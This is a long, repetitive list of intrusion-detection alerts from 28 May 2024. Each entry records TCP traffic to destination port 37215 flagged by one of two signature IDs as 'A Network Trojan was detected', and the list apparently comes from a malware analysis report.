          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.211388
          SID:2835222
          Source Port:57046
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.724655
          SID:2835222
          Source Port:58810
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.067215
          SID:2829579
          Source Port:60300
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.728717
          SID:2835222
          Source Port:43388
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.267112
          SID:2835222
          Source Port:45202
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.321941
          SID:2829579
          Source Port:58734
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.443992
          SID:2829579
          Source Port:38702
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.235643
          SID:2829579
          Source Port:34020
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.436117
          SID:2829579
          Source Port:44000
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.593114
          SID:2835222
          Source Port:35730
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.964424
          SID:2835222
          Source Port:37154
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.618740
          SID:2835222
          Source Port:43366
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.796888
          SID:2835222
          Source Port:48948
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.819420
          SID:2835222
          Source Port:51340
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.593290
          SID:2835222
          Source Port:55978
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.741519
          SID:2835222
          Source Port:39174
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.437800
          SID:2829579
          Source Port:59472
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.322116
          SID:2835222
          Source Port:58304
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.196202
          SID:2829579
          Source Port:56740
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.859775
          SID:2829579
          Source Port:48624
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.941398
          SID:2829579
          Source Port:55202
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.543319
          SID:2829579
          Source Port:38528
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.115840
          SID:2835222
          Source Port:34308
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.848294
          SID:2835222
          Source Port:34574
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.301127
          SID:2829579
          Source Port:34630
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.796327
          SID:2829579
          Source Port:58544
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.818886
          SID:2829579
          Source Port:46886
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.922508
          SID:2829579
          Source Port:39302
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.364851
          SID:2835222
          Source Port:34352
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.650077
          SID:2835222
          Source Port:46060
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.301112
          SID:2835222
          Source Port:43164
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.474743
          SID:2829579
          Source Port:60460
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.222416
          SID:2835222
          Source Port:32986
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.177213
          SID:2829579
          Source Port:43498
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.339207
          SID:2829579
          Source Port:37262
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.527311
          SID:2835222
          Source Port:49772
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.048783
          SID:2829579
          Source Port:41608
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.535261
          SID:2829579
          Source Port:47526
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.953406
          SID:2835222
          Source Port:56336
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.322341
          SID:2835222
          Source Port:60846
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.496709
          SID:2835222
          Source Port:45648
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.842926
          SID:2829579
          Source Port:39122
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.223191
          SID:2829579
          Source Port:58948
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.296914
          SID:2829579
          Source Port:60004
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.651496
          SID:2829579
          Source Port:45598
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.213496
          SID:2829579
          Source Port:33556
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.203805
          SID:2829579
          Source Port:54316
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.952012
          SID:2835222
          Source Port:36676
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.196125
          SID:2835222
          Source Port:52054
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.235989
          SID:2835222
          Source Port:53038
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.155605
          SID:2835222
          Source Port:50446
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.293133
          SID:2835222
          Source Port:53388
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.221504
          SID:2829579
          Source Port:54374
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.143827
          SID:2835222
          Source Port:35786
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.235812
          SID:2829579
          Source Port:42122
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.324250
          SID:2835222
          Source Port:40652
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.803372
          SID:2835222
          Source Port:34856
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.266503
          SID:2835222
          Source Port:60792
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.299242
          SID:2835222
          Source Port:60096
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.557462
          SID:2829579
          Source Port:55520
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.890112
          SID:2835222
          Source Port:38072
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.326553
          SID:2835222
          Source Port:58354
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.959724
          SID:2835222
          Source Port:33852
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.187381
          SID:2835222
          Source Port:45370
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.941578
          SID:2829579
          Source Port:51444
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.269260
          SID:2835222
          Source Port:41670
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.876202
          SID:2829579
          Source Port:50626
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.724667
          SID:2829579
          Source Port:51832
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.424309
          SID:2829579
          Source Port:58524
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.963122
          SID:2829579
          Source Port:33604
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.266752
          SID:2835222
          Source Port:43060
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.922809
          SID:2835222
          Source Port:36678
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.325718
          SID:2835222
          Source Port:40892
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.182592
          SID:2829579
          Source Port:36992
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.925471
          SID:2835222
          Source Port:51368
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.729068
          SID:2829579
          Source Port:47156
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.039344
          SID:2829579
          Source Port:49874
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.328851
          SID:2829579
          Source Port:37978
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.328865
          SID:2835222
          Source Port:53880
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.932770
          SID:2829579
          Source Port:36314
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.178042
          SID:2835222
          Source Port:58064
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.434516
          SID:2835222
          Source Port:47054
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.601408
          SID:2829579
          Source Port:44298
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.737333
          SID:2835222
          Source Port:49880
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.680264
          SID:2835222
          Source Port:59176
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.738441
          SID:2835222
          Source Port:40350
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.685030
          SID:2829579
          Source Port:56898
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.855558
          SID:2829579
          Source Port:54476
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.298561
          SID:2829579
          Source Port:57972
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.609221
          SID:2835222
          Source Port:53166
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.594304
          SID:2835222
          Source Port:34140
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.680392
          SID:2829579
          Source Port:59368
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.287361
          SID:2829579
          Source Port:42040
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.711602
          SID:2835222
          Source Port:59266
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.300223
          SID:2835222
          Source Port:43010
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.921106
          SID:2835222
          Source Port:36780
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.214267
          SID:2835222
          Source Port:53192
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.565817
          SID:2835222
          Source Port:45052
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.535714
          SID:2829579
          Source Port:41264
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.209146
          SID:2835222
          Source Port:56392
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.933400
          SID:2829579
          Source Port:39096
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.130665
          SID:2835222
          Source Port:42112
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.668085
          SID:2829579
          Source Port:54070
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.173196
          SID:2835222
          Source Port:52182
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.283649
          SID:2835222
          Source Port:36456
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.271856
          SID:2835222
          Source Port:52748
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.636604
          SID:2835222
          Source Port:47898
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.332729
          SID:2829579
          Source Port:58556
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.268458
          SID:2829579
          Source Port:57106
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.543265
          SID:2835222
          Source Port:33464
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:56.311197
          SID:2829579
          Source Port:55168
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.491343
          SID:2835222
          Source Port:35986
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.893513
          SID:2835222
          Source Port:37246
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.990652
          SID:2835222
          Source Port:56424
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.594483
          SID:2835222
          Source Port:35772
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.168316
          SID:2829579
          Source Port:49884
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:16.988641
          SID:2835222
          Source Port:56462
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.399709
          SID:2835222
          Source Port:48116
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.772780
          SID:2829579
          Source Port:40336
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:16.998358
          SID:2829579
          Source Port:57042
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.276229
          SID:2829579
          Source Port:39984
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.201124
          SID:2829579
          Source Port:36488
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:16.978392
          SID:2835222
          Source Port:59534
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.707252
          SID:2835222
          Source Port:36426
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.400958
          SID:2835222
          Source Port:51368
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.497423
          SID:2829579
          Source Port:48984
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.283565
          SID:2829579
          Source Port:41896
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.860394
          SID:2829579
          Source Port:39900
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.604383
          SID:2835222
          Source Port:60728
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.267130
          SID:2829579
          Source Port:50790
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.914203
          SID:2835222
          Source Port:39172
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.175768
          SID:2835222
          Source Port:38846
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.093724
          SID:2829579
          Source Port:52294
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.590635
          SID:2829579
          Source Port:34554
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.848443
          SID:2829579
          Source Port:60424
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.403135
          SID:2829579
          Source Port:41010
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.588606
          SID:2835222
          Source Port:41444
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.154061
          SID:2829579
          Source Port:52740
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.170907
          SID:2829579
          Source Port:34662
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.697016
          SID:2835222
          Source Port:59274
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.591545
          SID:2835222
          Source Port:36976
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.548608
          SID:2829579
          Source Port:37806
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.214113
          SID:2835222
          Source Port:57472
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.942311
          SID:2829579
          Source Port:54928
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.689498
          SID:2835222
          Source Port:51490
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.729607
          SID:2835222
          Source Port:56556
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.957895
          SID:2829579
          Source Port:57124
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.840470
          SID:2829579
          Source Port:40764
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.932611
          SID:2835222
          Source Port:59622
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.962833
          SID:2829579
          Source Port:57886
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.941332
          SID:2829579
          Source Port:45132
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.142627
          SID:2829579
          Source Port:41208
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.325737
          SID:2835222
          Source Port:40704
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.064891
          SID:2835222
          Source Port:58494
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.971347
          SID:2835222
          Source Port:44340
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.277002
          SID:2829579
          Source Port:39218
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:16.988984
          SID:2835222
          Source Port:46938
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.931853
          SID:2835222
          Source Port:50248
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.637158
          SID:2835222
          Source Port:49060
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.891879
          SID:2835222
          Source Port:44224
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.176452
          SID:2829579
          Source Port:41572
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.177306
          SID:2835222
          Source Port:35400
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.195400
          SID:2835222
          Source Port:43864
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.705779
          SID:2835222
          Source Port:51876
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.594296
          SID:2829579
          Source Port:53012
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.797911
          SID:2829579
          Source Port:54442
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.221451
          SID:2835222
          Source Port:44684
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.738411
          SID:2835222
          Source Port:44356
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.591349
          SID:2829579
          Source Port:57134
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.325267
          SID:2829579
          Source Port:42556
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.974012
          SID:2829579
          Source Port:38636
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.115875
          SID:2835222
          Source Port:53526
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.465364
          SID:2829579
          Source Port:48020
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.943341
          SID:2835222
          Source Port:54262
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.709446
          SID:2829579
          Source Port:41994
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.117156
          SID:2829579
          Source Port:41294
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.547548
          SID:2835222
          Source Port:55586
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.341229
          SID:2829579
          Source Port:43488
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.481141
          SID:2829579
          Source Port:52072
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.962431
          SID:2829579
          Source Port:36770
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.177132
          SID:2829579
          Source Port:53236
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.542351
          SID:2835222
          Source Port:43692
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.591113
          SID:2835222
          Source Port:52470
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:16.976827
          SID:2829579
          Source Port:40262
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.877677
          SID:2835222
          Source Port:38356
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.399826
          SID:2829579
          Source Port:50474
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.846900
          SID:2829579
          Source Port:34492
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.742401
          SID:2829579
          Source Port:51588
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.963128
          SID:2829579
          Source Port:44740
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.215899
          SID:2835222
          Source Port:53318
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.142528
          SID:2829579
          Source Port:55014
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.188961
          SID:2829579
          Source Port:49032
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.222216
          SID:2829579
          Source Port:49110
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.994898
          SID:2835222
          Source Port:60692
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.299740
          SID:2835222
          Source Port:59358
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.703883
          SID:2829579
          Source Port:58358
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.480219
          SID:2835222
          Source Port:34620
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
